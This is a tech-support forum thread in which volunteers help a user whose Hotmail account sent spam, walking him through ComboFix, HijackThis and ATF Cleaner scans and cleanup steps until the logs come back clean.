[Taxboy]

Here's my original post over on Birdforum.net

I try to keep my machine protected & update regularly - AVG Antivirus, AVG Spyware, Windows Defender, Ad-Aware & Spybot. I have run these through & found nothing but have discovered that my hotmail has sent spam to everyone in my hotmail address book advertising a youpwtr.com address. I haven't visited the site & deliberately didn't link here for obvious reasons.

This looks like a virus but my machine tests clean and only e-mails from my web based mail were sent - not my private outlook mail.

Does anyone have any ideas what might have happened and following a suggestion from Howard I have now completed all steps here http://techsupportteam.org/forum/showthread.php?t=43

I have attached the logs - the only problem I had was the AVG antispyware. The first time I ran it I could not get a report created so I repeated the test and got a nil report. However the only things it found were tracking cookies rated medium originally. I 'm hoping that I'm not infected but any confirmation either way would be very much appreciated

TIA

Andrew

[evilfantasy]

Uninstall combofix and reinstall it to the DESKTOP as the instructions stated please.




Delete these files/folders, as follows:

1. Please open Notepad it must be Notepad, not Wordpad.

• Click Start , then Run
• Type notepad .exe in the Run Box.

2. Copy the text below by highlighting all the text and pressing Ctrl+C

Quote:

Folder::
C:\VundoFix Backups

File::
C:\WINDOWS\system32\tmp.reg
C:\WINDOWS\system32\VCCLSID.exe
C:\WINDOWS\system32\SrchSTS.exe
C:\WINDOWS\system32\IEDFix.exe
C:\WINDOWS\system32\Process.exe
C:\WINDOWS\system32\dumphive.exe
C:\WINDOWS\system32\WS2Fix.exe

3. Go to the Notepad window and click Edit > Paste
4. Then click File > Save
5. Name the file CFScript.txt - Save the file to your Desktop
6. Then drag the CFScript (hold the left mouse button while dragging the file) and drop it (release the left mouse button) into ComboFix.exe as you see in the screenshot below. Important: Perform this instruction carefully!



ComboFix will begin to execute, just follow the prompts. After reboot (in case it asks to reboot), it will produce a log for you. Post that log (Combofix.txt) in your next reply.

Note: Do not mouseclick combofix's window while it is running. That may cause your system to freeze

---------------

Open HijackThis and select Do a system scan only then place a check mark next to:

O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

Close all windows except for HijackThis and click Fix checked

Exit Hijackthis.

---------------

Run ATF Cleaner.

Please download ATF Cleaner by Atribune. ATF Cleaner.exe

Make sure that all browser windows are closed.

• Double-click ATF-Cleaner.exe to run the program.
• Under Main choose: Select All and UNCHECK Cookies.
• Click the Empty Selected button.

If you use Firefox browser

• Click Firefox at the top and choose: Select All and UNCHECK Cookies.
• Click the Empty Selected button.
  NOTE: If you would like to keep your saved passwords, please click No at the prompt.

If you use Opera browser

• Click Opera at the top and choose: Select All and UNCHECK Cookies.
• Click the Empty Selected button.
  NOTE: If you would like to keep your saved passwords, please click No at the prompt.

Click Exit on the Main ATF Cleaner menu to close the program.

---------------

Next post please attach
Combofix log
New Hijackthis log

[Howard]

Hello and welcome to TST.

I`m sorry I wasn`t around when you posted. However, you`re in very good hands with Evilfantasy.

Regards Howard

[Backyard]

There is a site circulating somewhere that pretends to be hotmail. When you login it will re-direct to the real hotmail site and ask you to re-login cause the email and password were incorrect!

[Taxboy]

Hi

Thanks for the welcome and assistance - it's very much appreciated.

As requested pls find the combofix log and hijack this log

[evilfantasy]

The logs now look fine.

How is the computer?

[Taxboy]

Seems to be working a bit quicker

Thanks for your help - your time is much appreciated

[evilfantasy]

Closing steps.

Go to Start > Run and copy and paste next command in the field:

ComboFix /u

Make sure there's a space between Combofix and /u
Then hit Enter.

This will uninstall Combofix, delete its related folders and files, reset your clock settings, hide file extensions, hide the system/hidden files and resets System Restore again

----------

Let's clear out the programs we've been using to clean up your computer, they are not suitable for
general malware removal and could cause damage if launched accidentally.

Please download OTMoveIt2 by OldTimer OTMoveIt2.exe and place it on your desktop.

1. Double click OTMoveIt2.exe to launch it.
2. Click on the CleanUp! button.
3. OTMoveIt2 will download a list from the Internet, if your firewall or other defensive programs alerts you, allow it access.
4. Click YES at the next prompt (list downloaded, Do you want to begin cleanup process?)

• When finished exit out of OTMoveIt2

----------

Learn more about how to protect yourself while on the internet read this article by Tony Klien: So how did I get infected in the first place?



Let us know if anything else comes up.

[Howard]

This thread is now closed: If you need this thread unlocking, please pm a moderator with a link to the thread.

Only the original thread starter can do this. Anyone else, will be ignored.

Regards Howard

[evilfantasy]

OOps.

I'm going to have to remember the solved threads part.

[Howard]

Hehe, I forget too sometimes mate.

regards Howard